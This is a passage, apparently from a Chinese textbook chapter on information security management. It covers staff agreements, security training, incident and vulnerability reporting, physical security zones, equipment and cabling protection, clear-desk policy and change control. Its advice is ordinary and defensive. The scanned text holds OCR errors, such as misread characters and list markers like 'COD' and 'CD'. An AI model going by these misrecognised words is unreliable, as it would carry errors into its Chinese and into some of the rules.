现 有 的 合同 (包括 保密 协议 ) 中 没有 涉及 临时 性 员工 和 第 三 方 用 户 的 问题 ,在 允许 他 们 
访问 信息 处 理 设 备 之 前 ,应 要 求 他 们 签署 一 份 协议 。 如 果 雇 佣 条 款 或 合同 发 生 了 变化 ,特别 
是 在 雇员 要 离开 组 织 或 合同 要 到 期 时 ,要 对 保密 协议 进行 重新 审阅 。 

3. 雇佣 条 款 和 条 件 

雇佣 条 款 和 条 件 应 该 规定 员工 的 信息 安全 责任 。 如 有 需要 ,该 责任 在 结束 雇佣 关系 后 
的 一 段 特 定 的 时 间 内 仍然 有 效 。 条 款 中 还 应 该 包括 如 果 雇 员 无 视 安全 要 求 ,那么 可 对 其 采 
取 措 施 。 

雇佣 条 款 和 条 件 中 也 应 该 包括 雇员 的 法 律 责任 和 权限 方面 的 条 款 ,如 关于 版 权 法 或 数 
据 保护 法 规 方面 的 内 容 。 条 款 中 还 应 该 注 明 对 雇员 相关 数据 进行 分 类 和 管理 方面 的 责任 。 

如 果 有 必要 的 话 ,雇佣 条 款 和 条 件 中 应 说 明 员工 在 组 织 办 公 地 点 和 正常 工作 时 间 以 外 
(如 在 家 工作 时 ) 应 该 承担 的 责任 。 


7.4.1 用 户 培 训 


用 户 培 训 的 目标 是 保证 用 户 了 解 信息 安全 存在 的 威胁 和 问题 ,在 正常 工作 中 切实 遵守 
组 织 安全 策略 。 应 对 用 户 进行 安全 步骤 和 正确 使 用 信息 处 理 设备 的 培训 ,将 可 能 的 安全 风 
险 降 到 最 低 。 

1. 信息 安全 的 教育 与 培训 

组 织 所 有 员工 以 及 相关 的 第 三 方 用 户 应 该 就 组 织 策略 和 程序 接受 适当 的 培训 并 定期 了 
解 最 新 变化 。 这 包括 安全 要 求法 律 责 任 和 业务 控制 措施 方面 的 内 容 , 以 及 如 何 使 用 信息 处 
理 设备 方面 的 培训 ,如 登录 的 步 又、 软件 包 的 使 用 方法 等 。 当 然 在 此 之 前 ,必须 授予 其 访问 
信息 或 服务 的 权限 。 

2. 对 安全 事故 和 故障 的 处 理 

对 安全 事故 和 故障 的 处 理 的 目标 是 最 大 限度 降低 由 于 事故 和 故障 而 遭受 的 损失 ,对 此 
类 事故 进行 监控 并 吸取 教训 。 将 影响 安全 的 事故 通过 适当 的 管理 渠道 尽快 汇报 。 各 种 类 型 
的 安全 事故 (安全 破坏 行为 威胁 、 弱 点 或 故障 ) 对 组 织 资产 的 安全 都 会 产生 影响 ,所 有 雇员 
和 承包 商都 应 了 解 报告 各 个 类 型 安全 事故 的 步 又。 他们 应 尽快 将 观察 到 的 或 可 疑 的 事件 报 
告 给 事先 指定 的 联系 人 。 组 织 应 建立 正式 的 处 分 条 例 , 处 罚 那些 进行 违反 安全 活动 的 雇员 。 
要 妥善 处 理 安全 事故 ,应 在 事故 发 生 后 ,尽快 收集 证 据 。 

3. 安全 事故 报告 

将 影响 安全 的 事故 通过 适当 的 管理 渠道 尽快 汇报 。 应 该 建立 一 套 正式 的 报告 安全 事故 
的 步骤 以 及 一 套 安 全 事故 的 响应 步骤 ,后 者 应 规定 在 收 到 安全 事故 报告 后 ,应 该 采取 的 行 
动 。 所 有 雇员 和 承包 商都 应 该 了 解 报告 安全 事故 的 程序 步骤 ,并 根据 要 求 , 尽 快报 告 安全 事 
故 。 应 该 建立 适当 的 反馈 渠道 ,以 保证 安全 事故 处 理 完毕 后 ,报告 人 能 知道 该 事件 的 处 理 结 
果 。 在 进行 用 户 报 警 培训 时 ,可 以 将 这 些 事件 作 为 示例 ,向 用 户 讲解 可 能 发 生 什么 事件 、 如 
何 对 这 些 事件 进行 处 理 以 及 今后 如 何 避 免 这 类 事件 发 生 。 
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4. 安全 漏洞 报告 

应 该 要 求 信息 服务 用 户 在 发 现 或 怀疑 系统 或 服务 出 现 安 全 漏洞 或 受到 威胁 时 ,立即 进 
行 记录 并 汇报 。 他 们 应 该 将 这 些 事件 尽快 报告 给 管理 层 , 或 直接 报告 给 服务 提供 商 。 应 该 
告诉 用 户 ,在 任何 情况 下 ,也 不 要 试图 证 明 一 个 可 疑 安 全 漏洞 。 这 也 是 为 了 保护 他 们 自己 ， 
这 是 因为 在 测试 某 个 漏洞 时 ,很 可 能 会 导致 对 系统 的 错误 使 用 。 

5. 软件 故障 报告 

应 建立 报告 软件 故障 的 程序 步骤 ,应 考虑 采取 以 下 措施 。 

COD 将 问题 的 征兆 和 屏幕 上 显示 的 消息 记录 下 来 。 

(2). 应 将 该 计算 机 隔离 ,如 果 可 能 ,停止 使 用 该 计算 机 。 立 刻 向 合适 的 联系 人 报警 。 如 
果 要 检修 设备 ,在 重新 接 通 该 设备 的 电源 前 ,应 将 其 从 公司 的 网 络 中 断 开 。 不 要 将 磁盘 拿 到 
其 他 计算 机 上 使 用 。 

(3) 立刻 将 问题 报告 给 信息 安全 管理 人 员 。 除 非得 到 授权 ,用 户 不 要 试图 删除 可 疑 的 
软件 ,应 由 经 过 培训 富有 经 验 员 工 执 行 恢复 工作 。 

6. 从 事故 中 吸取 教训 

应 该 采用 一 种 机 制 ,将 事故 和 故障 的 类 型 .规模 和 损失 进行 量化 和 监控 。 用 这 些 信息 来 
确定 重复 发 生 的 或 影响 很 大 的 事故 或 故障 。 这 需要 使 用 功能 更 强 的 或 其 他 的 控制 措施 ,以 
降低 事故 发 生 的 频率 、 损 失 ,或 在 修订 安全 策略 的 过 程 中 ,将 这 一 因素 考虑 在 内 。 

7. 纪律 检查 程序 

应 该 建立 正式 的 处 分 流程 ,处 罚 那 些 违反 组 织 安全 策略 和 规定 的 雇员 。 对 那些 无 视 安 
全 工作 步 又 的 雇员 来 说 ,这 种 方法 就 是 一 种 威 慨 。 另 外 ,如 果 怀 疑 某 些 员 工 有 严重 或 长 期 违 
反 组 织 安全 的 行为 ,这 一 方法 能 保证 对 他 们 的 处 罚 是 正确 和 公平 的 。 


7.5 实际 和 环境 的 安全 


7.5.1. 安全 区 域 


设立 安全 区 域 的 目标 是 防止 对 公司 工作 场所 和 信息 的 非法 访问 、 破 坏 和 干扰 。 应 该 将 
关键 或 敏感 的 商业 信息 处 理 设备 放 在 安全 的 地 方 ,使 用 相应 的 安全 防护 设备 和 准 入 控制 手 
段 以 及 有 明确 标志 的 安全 隔离 带 进行 保护 。 应 使 这 些 设备 免 受 未 经 授权 的 访问 、 损 害 或 干 
扰 。 根 据 所 确定 的 风险 的 具体 情况 ,提供 相应 的 保护 。 对 纸张 .介质 和 信息 处 理 设备 建议 采 
取 桌 面 清 空 和 屏幕 清空 策略 ,降低 对 纸张 .介质 和 信息 处 理 设备 进 行 未 经 授权 访问 所 带 来 的 
风险 和 损害 。 

1. 实际 安全 隔离 带 

可 以 在 组 织 办 公 区 域 和 信息 处 理 设备 周围 建立 几 个 实际 的 防护 设备 ,提供 物理 保护 。 
每 个 防护 设备 都 划分 出 一 个 安全 区 域 , 这 都 提高 了 整体 的 保护 效果 。 各 个 组 织 应 使 用 安全 
区 域 保护 信息 处 理 设备 等 资产 。 安 全 区 域 是 用 防护 设备 隔 开 的 一 块 区 域 ,例如 通过 一 堵 墙 、 
刷卡 才能 进入 的 控制 门 或 人 工 值守 的 前 台 。 防 护 设备 的 位 置 和 强度 取决 于 风险 评估 的 结 
果 。 在 需要 时 ,可 以 考虑 并 实施 以 下 指导 原则 和 控制 措施 。 

(1) 应 明确 划分 安全 区 域 。 


(2) 建筑 物 或 某 个 地 方 中 存 放 信息 处 理 设 备 的 安全 区 域 的 位 置 应 该 非常 合理 (如 安全 
区 域 和 易 发 生 冯 人 行为 的 区 域 不 应 隔 开 )。 安 全 区 域 四 周 应 有 坚固 的 围墙 ,所 有 可 以 进出 安 
全 区 域 的 大 门 应 能 防止 未 经 授权 的 访问 ,如 使 用 控制 装置 .栅栏 .报警 装备 、 锁 等 。 

(3) 设立 一 个 人 工 值守 的 接待 区 域 或 使 用 其 他 方法 ,将 对 现场 或 建筑 物 的 实际 访问 限 
制 在 适当 的 区 域 中 。 只 有 经 过 授权 的 人 才能 进入 现场 或 建筑 物 。 

(4) 如 有 必要 ,可 进行 全 方位 的 防护 ,以 防止 有 人 未 经 授权 进入 安全 区 域 ,以 及 由 火灾 
和 水 灾 引 起 的 环境 问题 的 影响 。 

(5) 安全 区 域 的 所 有 防火 门 应 报警 并 关闭 。 

2. 安全 区 域 出 人 控制 措施 

安全 区 域 应 该 使 用 适当 的 出 入 控制 措施 予以 保护 。 未 经 批准 ,任何 人 员 不 得 出 入 ,应 考 
虑 以 下 控制 措施 。 

(1) 必须 调查 并 和 弄 清 安全 区 域 的 来 访 者 的 身份 ,并 将 他 们 进入 和 离开 安全 区 域 的 日 期 
和 时 间 记 录 在 案 。 只 有 来 访 者 有 特定 的 ,经 过 授权 的 目的 时 ,才能 进入 安全 区 域 ,而 且 还 要 
告诉 他 们 该 区 域 的 安全 要 求 和 紧急 情况 下 的 行动 步骤 。 

(2) 只 有 严格 限定 ,经 过 授权 的 人 才能 访问 敏感 信息 ,使 用 信息 处 理 设 备 。 在 对 所 有 访 
问 行 为 进行 授权 和 验证 时 ,应 采用 一 些 强制 性 的 控制 措施 ,如 使 用 带 PIN 的 卡 进行 刷卡 。 
应 对 所 有 访问 严格 执行 审计 流程 。 

(3) 要 求 所 有 人 员 佩 带 易于 辨认 的 标识 ,并 鼓励 他 们 盘问 无 人 陪同 的 陌生 人 以 及 未 佩 
带 标识 的 人 。 

(4) 应 经 常 审 查 并 更 新 有 关 安 全 区 域 访问 权限 的 规定 。 

3. 办 公 场 所 、 房 屋 和 设施 的 安全 保障 

安全 区 域 可 能 是 安全 隔离 带 中 的 一 间 加 锁 的 办 公 室 或 几 个 房间 ,安全 隔离 带 本 身 也 可 
能 是 加 锁 的 并 包括 几 个 可 加 锁 的 小 房间 或 保险 箱 。 在 选择 和 设计 安全 区 域 时 ,应 将 以 下 各 
种 问题 带 来 的 损害 考虑 在 内 : 火灾 、 水 灾 、 爆 炸 、 社 会 动荡 以 及 其 他 形式 的 自然 或 人 为 的 灾 
害 。 也 应 该 将 各 种 相关 的 健康 和 安全 方面 的 规定 和 标准 考虑 在 内 。 还 应 该 考虑 到 临近 的 隔 
离 带 可 能 带 来 的 安全 威胁 ,如 其 他 安全 区 域 发 生 泄露 事件 。 

应 考虑 以 下 控制 措施 。 

(1) 关键 设备 应 放 在 公众 无 法 进入 的 地 方 。 

(2) 建筑 物 应 该 不 很 显眼 ,使 人 无 法 察觉 该 建筑 物 的 用 途 ,在 建筑 物 的 内 外 都 没有 明显 
标志 表明 建筑 物 内 进行 着 信息 处 理 活动 。 

(3) 安全 区 域内 各 种 设备 (如 影印 机 、 传 真 机 ) 齐 全 ,并 放 在 相应 的 地 方 ,以 防止 未 经 授 
权 的 人 员 使 用 ,否则 会 泄露 信息 。 

CD 在 没 人 的 时 候 , 将 门窗 关闭 ,还 要 注意 防止 有 人 从 窗户 ,特别 是 只 有 一 层 的 窗户 就 
可 以 进入 安全 区 域 。 

O) 按照 专业 标准 安装 入 侵 检 测 系 统 并 经 常 检查 ,以 对 可 进入 安全 区 域 的 门 和 窗户 进 
行 检查 。 对 无 人 区 域 进 行 24 小 时 的 报警 监视 。 对 其 他 区 域 也 应 该 提供 相应 的 保护 ,如 计 
算 机 房 或 通信 室 。 

(6) 由 组 织 自己 管理 的 信息 处 理 设备 应 与 由 第 三 方 管理 的 信息 处 理 设备 分 开 。 

(7) 通过 有 些 目录 和 内 部 人 员 电话 号 码 本 ,能 确定 敏感 信息 处 理 设 备 的 位 置 , 不 能 让 公 
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众 得 到 这 些 资料 。 

(8) 应 将 危险 或 易 燃 材料 存储 在 安全 的 地 方 ,与 安全 区 域 保持 安全 距离 。 除 非 有 特殊 
要 求 , 否 则 不 要 把 大 量 的 物品 ,如 文具 ,存储 在 安全 区 域内 。 

(9) 使 应 急 设 备 和 备份 介质 的 存储 位 置 与 主 安全 区 域 保 持 一 个 安全 距离 ,以 防止 主 安 
全 区 域 发 生 的 灾难 事件 殊 及 这 些 设备 。 
4. 在 安全 区 域 中 工作 
要 加 强 安全 区 域 的 安全 性 ,还 应 该 采用 其 他 控制 措施 和 指导 原则 。 包 括 如 何 控 制 在 安 
全 区 域内 工作 的 个 人 和 第 三 方 人 员 ,以 及 如 何 控制 第 三 方 人 员 在 安全 区 域内 的 活动 。 应 考 


虑 以 下 问题 。 
只 有 在 有 必要 的 前 提 下 ,才能 让 某 个 人 知道 有 一 个 安全 区 域 或 安全 区 域内 所 进行 的 
活动 。 


出 于 安全 原因 和 消除 恶意 行为 发 生 的 机 会 的 方面 考虑 ,不 允许 在 安全 区 域内 进行 未 经 
调查 的 工作 。 

关闭 无 人 使 用 的 安全 区 域 , 每 隔 一 段 时 间 ,进行 一 次 检查 。 

只 有 在 需要 时 ,才能 允许 第 三 方 的 支持 服务 人 员 进 入 安全 区 域 或 使 用 敏感 信息 处 理 设 
备 , 必 须 对 其 访问 行为 进行 授权 和 监视 。 在 不 同 的 范围 之 间 还 需要 隔离 区 域 控 制 实际 访问 ， 
在 安全 区 域内 有 不 同 的 安全 要 求 。 

除非 经 过 授权 ,不 允许 使 用 图 像 视频、 音频 和 其 他 记录 设备 。 

5. 与 其 他 区 域 隔 离 的 交 货 和 装载 区 域 

应 该 对 装运 区 域 进 行 控制 ,而 且 应 根据 情况 将 其 与 信息 处 理 设施 隔离 开 来 ,避免 非法 访 
问 。 这 类 区 域 的 安全 要 求 由 风险 评估 的 情况 决定 。 应 考虑 以 下 指导 原则 。 

(1) 只 有 经 过 确认 并 授权 的 人 才能 从 外 面 进入 存放 物品 的 区 域 。 

(2) 设计 存放 物品 区 域 时 ,要 达到 如 下 效果 : 负责 交 货 的 人 员 不 需要 进入 建筑 物 的 其 
他 部 分 ,就 可 以 将 货物 印 下 。 

(3) 当 存 放 物 品 的 区 域内 部 的 门 打开 时 ,一定 要 保证 外 部 的 门 是 安全 的 。 

CD 在 将 已 收 下 的 材料 从 存货 区 移 到 使 用 地 点 前 ,必须 对 其 进行 检查 ,以 防止 潜在 的 
危险 。 

(5) 如 果 可 以 ,在 入 口 处 对 收 下 的 材料 进行 登记 。 


7.5.2. 设备 的 安全 


设备 安全 的 目标 是 防止 资产 流失 、 受 损 或 毁坏 ,以 及 业务 活动 中 断 。 应 保证 设备 免 受 安 
全 方面 的 威胁 和 环境 的 危害 。 要 降低 对 数据 进行 未 经 授权 访问 的 风险 并 免 受 损失 或 损坏 ， 
必须 对 设备 (包括 不 在 现场 使 用 的 设备 ) 进 行 保护 。 还 需要 考虑 设备 的 位 置 和 选 址 问题 。 可 
能 需要 特殊 的 控制 措施 来 保护 免 遭 危险 或 非法 访问 ,并 保护 辅助 设施 (如 电源 和 电线 等 基础 
设施 )。 

1. 设备 选 址 与 保护 

应 该 注重 设备 的 选 址 与 保护 ,减少 来 自 环境 威胁 和 人 危险 ,以 及 降低 非法 访问 的 风险 。 应 
考虑 以 下 问题 。 

COD 将 设备 安装 在 合适 的 位 置 ,不 到 必要 时 ,尽量 避免 进入 工作 区 。 


(2) 确定 处 理 敏 感 数据 的 信息 和 存储 设备 的 位 置 时 ,应 注意 选择 合适 的 位 置 ,降低 使 用 
过 程 中 因 牙 忽 造成 的 风险 。 

(3) 应 该 将 需要 特殊 保护 的 设备 隔离 ,以 降低 所 需 的 保护 级 别 。 

(4) 应 采用 相应 的 控制 措施 , 尽 可 能 降低 潜在 威胁 的 风险 ,包括 盗窃 、 火 灾 、 爆 炸 、 烟 尘 、 
供水 问题 (或 停 水 ) 、 灰 侍 \ 振 动 . 化 学 制品 的 影响 、 供 电 干 扰 、 电 磁 辐 射 。 

(5) 组 织 在 考虑 其 策略 时 ,应 将 在 信息 处 理 设备 附近 就 餐 、 饮 水 和 吸烟 的 情况 考虑 
JE. 

(6) 有 些 环境 条 件 会 对 信息 处 理 设备 的 运行 产生 负面 影响 ,应 仔细 监视 这 些 条 件 。 

CD 对 于 在 工业 环境 下 运行 的 设备 ,应 考虑 使 用 特殊 的 保护 方法 ,如 在 键盘 表面 加 一 
层 膜 。 

(8) 应 考虑 临近 办 公 区 域 发 生 灾 难事 件 的 影响 ,如 临近 建筑 物 发 生火 灾 、 天 花 板 漏水 或 
地 板 渗水 或 大 街 上 发 生 爆 炸 事件 。 

2. 电源 

应 该 防止 设备 出 现 电源 故障 ,防止 其 他 供电 不 正常 的 现象 。 应 提供 稳定 的 电力 供应 , 符 
合 设备 生产 商 说 明 书 的 规定 。 保 证 连续 供电 的 方法 有 : 多 回路 供电 ,以 防止 某 个 回路 出 现 
问题 ,造成 断 电 事故 ; 不 间断 电源 CUPS; 备用 发 电机 。 

对 于 为 重要 商业 业务 提供 电力 支持 的 设备 ,需要 使 用 UPS 以 保证 设备 可 以 依次 关闭 
或 持续 运行 。 应 急 计划 中 应 包括 UPS 发 生 故 障 如 何 应 付 的 内 容 。 应 经 常 检查 UPS 设备 ， 
以 保证 其 功率 足够 大 并 根据 生产 商 推荐 的 方法 进行 测试 。 

在 发 生 较 长 时 间 的 断 电 事故 时 ,而 业务 必须 继续 进行 , 则 可 以 考虑 使 用 后 备 发 电机 。 如 
果 已 经 安装 了 发 电机 ,应 根据 生产 商 的 指示 ,对 发 电机 进行 定期 测试 。 应 保证 燃料 供应 充 
足 ,使 发 电机 能 运行 更 长 一 段 时 间 。 

另外 ,在 紧急 出 口 处 的 设备 间 中 应 安装 紧急 电力 开关 , 以便 在 紧急 情况 下 迅速 切断 电 
源 。 万 一 主 回路 发 生 故 障 , 应 提供 应 急 照 明 。 所 有 建筑 物 都 应 采用 照明 保护 设备 ,所 有 露天 
的 通信 线 都 应 配备 照明 保护 滤 光 器 。 


3. 电缆 安全 
电源 线 缆 与 通信 电线 承载 数据 或 支持 性 的 信息 服务 ,不 应 被 截断 或 受 损 。 应 考虑 以 下 
控制 措施 。 


A) 如 果 可 能 , 接 入 信息 处 理 设备 的 电源 线路 和 通信 线路 应 使 用 地 下 暗 线 ,或 为 其 提供 
多 种 保护 方法 。 

(2) 防止 未 经 授权 就 损坏 或 切断 网 络 线 缆 的 现象 ,如 将 线 缆 埋 和 人 管道 ,或 避免 通过 公共 

(3) 电力 线 缆 应 与 通信 线 缆 隔 离 ,以 避免 相互 的 干扰 。 

(4) 对 敏感 或 重要 的 系统 ,应 考虑 采用 进一步 的 控制 措施 : 在 探伤 位 置 和 端点 ,安装 铠 
装 管道 或 带 锁 的 箱 体 ; 使 用 其 他 路 由 或 传输 介质 ; 使 用 光纤 电缆 ; 去 除 线 缆 上 附着 的 未 经 
授权 的 设备 。 

4. 设备 维护 

应 对 设备 进行 妥善 地 维护 ,以 保证 其 持续 地 可 用 并 保持 完整 。 应 考虑 以 下 指导 原则 。 

(1) 按照 供应 商 推荐 的 服务 间隔 时 间 和 规范 ,对 设备 进行 维护 。 
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(2) 只 有 经 过 授权 的 维护 人 员 才 能 对 设备 进行 修理 和 维护 。 

(3) 将 所 有 可 能 的 或 实际 存在 的 故障 以 及 预防 性 和 休整 性 的 维护 手段 进行 备案 。 

CD 在 将 设备 送 修 时 ,应 采取 适当 的 控制 手段 。 应 遵守 所 有 保险 条 例 中 提出 的 要 求 。 

5. 场 外 设备 的 安全 

不 管 其 所 有 权 如 何 , 在 公司 办 公 区 域 以 外 使 用 信息 处 理 设 备 经 过 由 管理 层 授权 。 为 办 
区 域 以 外 设备 提供 的 安全 保护 ,应 与 办 公 区 域内 同类 设备 提供 的 安全 保护 相同 ,并 将 在 办 
区 域 以 外 使 用 设备 的 因素 考虑 在 内 。 信 息 处 理 设备 包括 各 种 形式 的 个 人 计算 机 、 组 织 者 、 
移动 电话 、 纸 张 或 表格 ,可 以 由 在 家 工作 的 员工 持 有 ,或 从 正常 工作 位 置 移 开 。 应 考虑 以 下 
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指导 原则 。 
从 办 公 区 域 将 设备 和 介质 取 走 时 ,不 要 在 公共 场所 引起 大 家 的 注意 。 旅 行 时 ,应 将 便携 
计算 机 放 在 手提 皮 箱 内 并 伪装 起 来 。 


应 随时 注意 制造 商 对 于 保护 设备 的 指导 ,如 防止 接触 强 电 磁场 。 

如 何 控 制 在 家 的 工作 由 风险 评估 的 结果 决定 ,如 有 需要 ,应 使 用 适当 的 控制 措施 ,如 可 
封闭 的 档案 室 、 下 班 后 桌面 不 允许 留 有 物品 的 策略 ,以 及 对 计算 机 使 用 的 控制 。 

应 采用 充分 的 保险 手段 保护 办 公 区 域 以 外 的 设备 。 

安全 风险 ,如 损坏 ,偷窃 以 及 听 行为 随地 点 的 不 同 会 有 很 大 的 不 同 , 在 确定 最 合适 的 
控制 措施 时 ,应 将 这 些 因素 考虑 在 内 。 

6. 设备 的 安全 处 置 与 重用 

如 果 在 处 理 或 重新 使 用 设备 时 ,不 加 以 注意 的 话 , 会 危及 信息 的 安全 。 对 于 存储 敏感 信 
息 的 存储 设备 ,应 将 其 销毁 ,或 重 写 数据 ,而 不 能 只 使 用 标准 的 删除 功能 。 

应 检查 所 有 设备 的 存储 介质 (如 固定 硬盘 ) ,确保 对 介质 进行 处 理 前 ,所 有 敏感 数据 和 授 
权 软 件 以 被 删除 或 覆盖 。 对 于 已 毁坏 的 包含 敏感 数据 的 存储 设备 ,应 对 其 进行 风险 评估 ,以 
确定 是 应 销毁 .修理 或 弃置 该 设备 。 

7. 常规 控制 措施 

常规 控制 措施 管理 的 目标 是 防止 信息 或 信息 处 理 设施 受 损 或 被 盗 。 应 防止 将 信息 和 信 
息 处 理 设备 暴露 给 未 经 授权 的 人 ,或 被 未 经 授权 的 人 修改 或 偷窃 ,并 应 采取 控制 措施 ,将 损 
失 或 损害 最 小 化 。 

8. 桌面 与 屏幕 管理 策略 

在 组 织 中 ,对 于 纸张 和 可 移动 的 存储 介质 ,应 采取 桌面 清空 策略 ; 对 于 信息 处 理 设备 ， 
应 采取 屏幕 清空 策略 ,以 降低 对 信息 进行 未 经 授权 访问 所 带 来 的 风险 、 损 失 和 损害 。 策略 应 
将 以 下 因素 考虑 在 内 : 信息 安全 分 类 、 相 应 的 风险 以 及 组 织 文化 方面 的 问题 ; 发 生 灾难 事 
件 , 留 在 桌面 上 的 信息 很 容易 损坏 或 销毁 ,如 火灾 ,水灾 或 爆炸 。 

应 考虑 以 下 指导 原则 。 

在 需要 时 ,在 纸张 和 计算 机 介质 暂时 不 用 时 ,特别 是 在 外 工作 时 ,将 其 存储 在 合适 的 加 
锁 的 柜子 和 /或 其 他 形式 的 安全 设备 中 。 

在 不 使 用 敏感 或 关键 的 商业 信息 时 ,特别 是 办 公 室 腾空 时 ,将 其 锁 起 来 (最 好 是 在 防火 
的 保险 箱 或 柜子 中 ) 。 

在 无 人 使 用 时 ,应 将 个 人 计算 机 和 计算 机 终端 和 打印 机 保持 注销 状态 ,并 用 键盘 锁 、 口 
令 或 其 他 控制 措施 保护 起 来 。 


应 将 往来 信件 的 地 址 和 无 人 使 用 的 传真 机 和 电 传 机 保护 起 来 。 

在 工作 时 间 以 外 ,将 影印 机 锁 起 来 (或 用 其 他 方法 防止 未 经 授权 的 使 用 ) 。 

在 打印 敏感 或 分 类 的 信息 后 ,应 立刻 从 打印 机 中 清除 。 

9. 资产 处 置 

未 经 授权 ,不 允许 将 设备 、 信 息 或 软件 带 离 工 作 场 所 。 如 有 必要 ,应 使 设备 处 于 注销 状 
D ,在 归还 设备 后 再 重新 登录 。 现 场 检 查 是 否 有 未 经 授权 就 移动 财产 的 行为 。 每 个 人 都 应 
知道 ,随时 会 进行 现场 检查 。 


7.6 通信 与 操作 管理 


7.6.1 操作 程序 和 责任 


操作 程序 和 责任 管理 的 目标 是 保证 信息 处 理 设施 的 操作 安全 无 误 。 应 该 建立 所 有 信息 
处 理 设 施 的 管理 和 操作 的 程序 和 责任 ,其 中 包括 制定 适当 的 操作 指令 和 事故 事件 的 响应 
程序 。 

在 适当 的 情况 下 进行 职责 划分 ,降低 无 意 或 有 意 造 成 的 系统 滥用 风险 。 

1. 明确 操作 程序 

应 对 安全 策略 确定 的 操作 程序 进行 备案 并 维护 。 操 作 程 序 应 作为 正式 文档 来 处 理 , 对 
它 进行 改动 需要 得 到 管理 层 授权 。 这 些 程序 步 又 应 指明 具体 执行 每 个 作业 的 指令 ,包括 ， 

(1) 处 理 和 使 用 信息 ; 

(2) 编制 需求 计划 ,包括 与 其 他 系统 的 相互 依赖 性 .最 先 开 始 的 和 最 后 完成 的 工作 的 时 间 ， 

(3) 处 理 错误 或 其 他 异常 情况 的 指令 ,这 些 异 常情 况 可 能 是 在 作业 执行 期 间 产 生 的 , 包 
括 对 使 用 系统 实用 程序 的 限制 ; 

(4) 在 出 现 意 外 的 操作 或 技术 问题 时 的 支持 联络 ; 

(5) 特殊 的 输出 处 理 指令 ,例如 使 用 特殊 文具 或 管理 秘密 输出 ,包括 安全 处 置 失 败 作业 
产生 输出 的 方法 ; 

(6) 在 系统 出 现 故 障 时 使 用 的 系统 重新 启动 和 恢复 的 措施 ; 

(7) 应 该 将 备案 的 方法 步 又 随时 用 于 处 理 与 信息 处 理 和 通信 设施 有 关 的 系统 内 务 管理 
活动 ,例如 计算 机 的 启动 和 关闭 程序 .备份 .设备 维护 .计算 机 机 房 和 邮件 处 理 管理 和 安全 。 

2. 操作 变更 控制 

应 该 控制 对 信息 处 理 设施 和 系统 的 变动 。 对 信息 处 理 设施 和 系统 控制 不 利 是 导致 系统 
或 安全 故障 的 常见 原因 。 应 落实 正式 的 管理 责任 和 措施 ,确保 对 设备 .软件 或 程序 的 所 有 变 
更 得 到 满意 的 控制 。 操 作 程序 应 严格 控制 变动 ,更 改 程序 时 ,应 保留 包含 所 有 相关 信息 的 审 
计 日 志 。 改 变 操 作 环 境 可 能 会 对 应 用 程序 造成 影响 。 在 适当 的 时 候 , 应 结合 操作 步骤 和 应 
用 更 改 控 制 步骤 。 尤 其 ,应 考虑 以 下 问题 。 

(1) 识别 并 记录 重大 变更 。 

(2) 评估 这 类 变更 的 潜在 影响 。 

(3) 提议 变更 的 正式 批准 程序 。 

(4) 向 所 有 相关 人 员 通 报 变更 细节 。 
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(5) 确定 中 止 变 更 并 从 失败 变更 中 恢复 的 责任 的 方法 。 

3. 事故 管理 程序 

应 该 明确 事故 管理 责任 ,制定 相关 程序 ,保证 对 安全 事故 反应 迅速 有效 且 有 条 不 率 。 
应 考虑 以 下 指导 方针 。 

(1) 制定 针对 各 种 可 能 存在 的 安全 事故 的 措施 ,这 些 事故 包括 : 信息 系统 故障 和 服务 
ER: 拒绝 服务 ; 业务 数据 不 完整 或 不 准确 产生 错误 ; 违反 保密 性 。 

(2) 除 一 般 用 于 尽快 恢复 系统 或 服务 的 应 急 计 划 外 ,这 些 措施 还 应 包括 : 分 析 和 鉴定 
事故 产生 的 原因 ; 根据 需要 ,制订 防止 再 次 发 生 的 补救 计划 并 执行 这 一 计划 ; 收集 审查 记 
录 和 类 似 证 据 ; 与 那些 受 意外 事件 影响 或 参加 从 意外 事件 中 恢复 工作 的 人 员 交 流 ; 向 上 级 
汇报 有 关 措 施 。 

G) 适当 地 收集 和 获得 审查 记录 和 类 似 证 据 。 内 部 问题 分 析 ; 用 作 与 可 能 违反 契约 、 
违反 规章 制度 的 证 据 ,或 者 触犯 民事 或 刑事 诉讼 (如 计算 机 误 用 或 数据 保护 立法 ) 的 证 据 ， 
与 软件 和 服务 供应 商 协商 赔偿 。 

(4) 严格 认真 地 控制 安全 违例 恢复 和 纠正 系统 故障 的 措施 。 这 些 措施 应 确保 : 

只 有 明确 确定 身份 和 获得 授权 的 人 员 才 允许 访问 正在 使 用 的 系统 和 数据 ; 

详细 记录 采取 的 所 有 紧急 措施 ; 

向 管理 层 汇 报 紧急 措施 ,并 进行 有 序 的 审查 ; 

以 最 小 的 延误 代价 确认 业务 系统 和 控制 的 完整 性 。 

4. 责任 划分 

责任 划分 是 降低 偶然 或 故意 的 系统 滥用 风险 。 为 减少 非法 自 改 或 滥用 信息 或 服务 ,应 
考虑 对 某 些 管理 或 执行 责任 或 者 责任 范围 进行 划分 。 

小 型 组 织 可 能 认为 这 种 控制 措施 难以 实现 ,但 应 该 尽 可 能 地 有 效应 用 这 一 原则 。 

当 难 以 划分 责任 时 ,应 该 考虑 使 用 其 他 控制 措施 ,例如 活动 监控 ,审计 追踪 和 管理 监督 
等 。 安 全 审计 保持 独立 是 非常 重要 的 。 

应 该 注意 的 是 ,没有 人 在 其 责任 范围 内 所 犯 的 错误 能 够 逃脱 检查 。 应 该 将 事件 执行 同 
事件 执行 的 授权 分 开 。 应 考虑 以 下 情况 。 

(1) 识别 哪些 是 为 达到 欺诈 目的 的 共 谋 串通 活动 (如 伪造 发 出 采购 订单 然后 证 明 货 物 
已 经 收 到 ) 非 常 重要 。 

(2) 如 果 存 在 串通 的 危险 ,那么 需要 制定 控制 措施 ,让 更 多 的 人 参与 ,降低 出 现 共 谋 的 
机 会 。 

5. 开发 设施 与 运营 设施 分 离 

开发 设施 测试 设施 与 操作 设施 分 离 对 实现 划分 职责 的 目的 非常 重要 。 应 制定 软件 从 
开发 向 操作 使 用 转移 的 规则 ,并 进行 备案 。 

开发 和 测试 活动 可 能 会 产生 严重 的 问题 ,例如 ,对 文件 或 系统 环境 进行 不 必要 的 改动 或 
产生 系统 故障 。 应 该 考虑 在 操作 、 测 试 和 开发 环境 之 间 进 行 一 定 程度 的 分 离 ,防止 出 现 操 作 
问题 。 在 开发 和 测试 部 门 之 间 也 应 该 进行 类 似 的 分 离 。 在 这 种 情况 下 ,需要 维护 一 个 已 知 
的 稳定 环境 ,在 这 个 环境 中 执行 有 效 地 测试 并 防止 不 适宜 的 开发 人 员 访 问 。 

当 开 发 人 员 和 测试 人 员 有 权 访 问 操作 系统 及 其 信息 时 ,他 们 可 能 会 带 入 非法 和 未 经 测 
